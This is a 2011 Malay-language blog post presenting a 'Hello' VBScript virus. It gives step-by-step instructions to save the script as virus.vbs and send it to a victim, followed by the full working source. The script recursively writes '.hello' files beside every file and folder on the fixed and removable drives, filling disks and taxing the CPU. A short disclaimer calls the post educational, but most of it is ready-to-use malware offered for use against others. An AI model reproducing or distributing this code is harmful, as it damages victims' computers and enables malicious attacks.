Thursday, February 3, 2011

Virus Hello

Berikut adalah coding virus Hello yang mungkin boleh digunakan sebagai trap. dengan hanya menggunakan advance vbs to exe mahupun procedure yang lain, anda mampu memyebabkan computer victim mengalami masalah yang sangat teruk. virus ini juga mampu menyebabkan HDD menjadi semakin penuh akibat duplicating files yang terlalu banyak.. virus ini juga boleh menyebabkan masalah kepada CPU kerana terlalu banyak data/process terpaksa diallocate kan kepada task virus itu tadi. Oleh itu, adalah diminta kepada anda, memastikan VBS virus tidak mudah menyelami komputer anda.. virus ini telah diuji dengan menggunakan microsoft windows XP dan menyebabkan masalah yang serius tetapi tidak melibatkan masalah hardware mahupun kehilangan data cuma ianya menyebabkan HDD semakin penuh dan menambah masalah kedalam pemprosesan CPU. Bagi pengguna windows 7,
virus ini memerlukan UAC yang di benarkan, UAC boleh memblock virus ini daripada diexecute, akan tetapi, sekiranya diubah kepada execute file dan disetkan UAC nya, boleh menyebabkan masalah kepada victim computer. virus ini dicoding semata-mata untuk teach and learning, eddytech.my tidak akan bertanggung-jawab atas masalah yang mungkin timbul. eddytech.my hanya menyampaikan informasi serta knowledge-knowledge yang mungkin boleh dikongsi bersama-sama.

INSTRUCTION

1. Buka Notepad.exe dan pastekan coding dibawah
2. save sebagai virus.vbs
3. sent kepada victim. (SEGALA RISIKO DAN KEROSAKAN BUKAN DIBAWAH TANGGUNGJWB EDDYTECH.my)


rem - VBS/dlH "DL Hello" Virus - By D.L.
rem - Written on November 12th, 2003

On Error Resume Next
dim FSobj,orgMes,finalMes
set FSobj=CreateObject("Scripting.FileSystemObject")

orgMes="Hello! Don't be mad...I'm not a bad bug :) "
orgMes=replace(orgMes,chr(42),chr(68))
orgMes=replace(orgMes,chr(124),chr(46))
finalMes=replace(orgMes,chr(37),chr(76))


On Error Resume Next
dim drive,machine

set machine=FSobj.Drives
for each drive in machine 
     if (drive.DriveType=2)or(drive.DriveType=3) then
         indexFolders(drive.Path&"\")
    end If
next


sub indexFolders(location)
    On Error Resume Next
    dim specs,file,subFol,sayHello

    set specs=FSobj.GetFolder(location)
    set subFol=specs.SubFolders

    for each file in subFol
                set sayHello = FSobj.CreateTextFile(file.Path&".hello", 2, True)
        sayHello.write finalMes
        sayHello.Close
        writeData(file.Path)
        indexFolders(file.Path)
    next
end sub

sub writeData(location)
    On Error Resume Next
        dim folder,directory,file,sayHello

    set folder=FSobj.GetFolder(location)
    set directory=folder.Files

    for each file in directory
         set sayHello = FSobj.CreateTextFile(file.Path&".hello", 2, True)
        sayHello.write finalMes
        sayHello.Close 
    next
end sub

0 comments:

Post a Comment

Eddytech menggunakan sistem comment yang tidak memerlukan anda untuk memasukkan "captcha" bagi memudahkan eddytech untuk mendapat feedback daripada anda :)